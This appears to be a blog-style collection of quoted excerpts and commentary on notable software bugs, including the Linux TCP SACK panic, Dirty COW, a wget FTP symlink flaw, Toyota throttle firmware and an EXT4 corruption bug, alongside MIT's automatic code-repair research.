With CVE-2019-11477, a string of TCP SACK responses will cause the Linux kernel to unexpectedly hit an internal data structure limit, triggering a fatal panic. The others affecting Linux will force the system to consume resources, thus slowing it down, as Red Hat explained in its technical summary today.
A fundamental design flaw in Intel’s processor chips has forced a significant redesign of the Linux and Windows kernels to defang the chip-level security bug.
There were rumors of a severe hypervisor bug – possibly in Xen – doing the rounds at the end of 2017. It may be that this hardware flaw is that rumored bug: that hypervisors can be attacked via this kernel memory access cockup, and thus need to be patched, forcing a mass restart of guest virtual machines.
The vulnerability, a variety known as a race condition, was found in the way Linux memory handles a duplication technique called copy on write. Untrusted users can exploit it to gain highly privileged write-access rights to memory mappings that would normally be read-only. More technical details about the vulnerability and exploit are available here, here, and here. Using the acronym derived from copy on write, some researchers have dubbed the vulnerability Dirty COW.
From there, the Helium system then replaces the original bit-rotted components with the re-optimized ones. The net result: Helium can improve the performance of certain Photoshop filters by 75 percent, and the performance of less optimized programs such as Microsoft Windows’ IrfanView by 400 to 500 percent.
“We’ve found that Helium can make updates in one day that would take human engineers upwards of three months,” says Amarasinghe. “A system like this can help companies make sure that the next generation of code is faster, and save them the trouble of putting 100 people on these sorts of problems.”
Having the ability to automatically fix bad code is like when they introduced auto focus on cameras to automatically fix bad focus or auto tunes to fix bad singing. The downside might be that development chooses to do less code reviews releasing more bad code into the wild relying on these automatic techniques to fix everything.
Here’s another article recently published by MIT News about this concept.
Remarkably, the system, dubbed CodePhage, doesn’t require access to the source code of the applications whose functionality it’s borrowing. Instead, it analyzes the applications’ execution and characterizes the types of security checks they perform. As a consequence, it can import checks from applications written in programming languages other than the one in which the program it’s repairing was written.
Source: Automatic bug repair | MIT News
It might be related to the kernel’s watchdog code due to research by Linus Torvalds. “So I’m looking at the watchdog code, and it seems racy [with regard to] parking and startup…Quite frankly, I’m just grasping for straws here, but a lot of the watchdog traces really have seemed spurious…”
“It was found that wget was susceptible to a symlink attack which could create arbitrary files, directories or symbolic links and set their permissions when retrieving a directory recursively through FTP,” developer Vasyl Kaigorodov wrote in a Red Hat Bugzilla comment. –
Wget is a linux command that allows a shell script to download a web page and store it to a file. This bug pertains to using a URL to do File Transfer Protocol (FTP) and not HTTP which is what wget was designed for. Here are a couple more snippets of this bug.
“Random bug found by accident, but the implication is that the FTP server can overwrite your entire filesystem,” Moore tweeted to eWEEK.
Don’t use wget for ftp. Don’t run wget with root permissions.
So just to recap here, Wget is on nearly every Linux server in the world, and it had a flaw that could have enabled anyone to overwrite directories on a server. That’s very serious.
You should only use wget for http downloads. This doesn’t sound like one of those Internet Dodges a Bullet problems.
As demonstrated, this vulnerability wasn’t a result of insufficient system testing; it was because of insufficient unit testing. Keith Ray himself wrote a “Testing on the Toilet”8 article, “Too Many Tests,”11 explaining how to break complex logic into small, testable functions to avoid a combinatorial explosion of inputs and still achieve coverage of critical corner cases (“equivalence class partitioning”). Given the complexity of the TLS algorithm, unit testing should be the first line of defense, not system testing. When six copies of the same algorithm exist, system testers are primed for failure.
Unless you’ve been living under a rock for a past couple of years, you must have heard of the Toyota unintended acceleration (UA) cases, where Camry and other Toyota vehicles accelerated unexpectedly and some of them managed to kill people and all of them scared the hell out of their drivers.
The recent trial testimony delivered at the Oklahoma trial by an embedded guru Michael Barr for the fist time in history of these trials offers a glimpse into the Toyota throttle control software. In his deposition, Michael explains how a stack overflow could corrupt the critical variables of the operating system (OSEK in this case), because they were located in memory adjacent to the top of the stack. The following two slides from Michael’s testimony explain the memory layout around the stack and why stack overflow was likely in the Toyota code (see the complete set of Michael’s slides).
The HTML5 Web Storage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB).
localStorageis awesome because it’s supported in all modern browsers (Chrome, Firefox 3.5+, Safari 4+, IE 8+, etc.).
As a warning for those who are normally quick to upgrade to the latest stable vanilla kernel releases, a serious EXT4 data corruption bug worked its way into the stable Linux 3.4, 3.5, and 3.6 kernel series.
The reason why the problem happens rarely is that the effect of the buggy commit is that if the journal’s starting block is zero, we fail to truncate the journal when we unmount the file system. This can happen if we mount and then unmount the file system fairly quickly, before the log has a chance to wrap. After the first time this has happened, it’s not a disaster, since when we replay the journal, we’ll just replay some extra transactions. But if this happens twice, the oldest valid transaction will still not have gotten updated, but some of the newer transactions from the last mount session will have gotten written by the very latest transacitons, and when we then try to do the extra transaction replays, the metadata blocks can end up getting very scrambled indeed.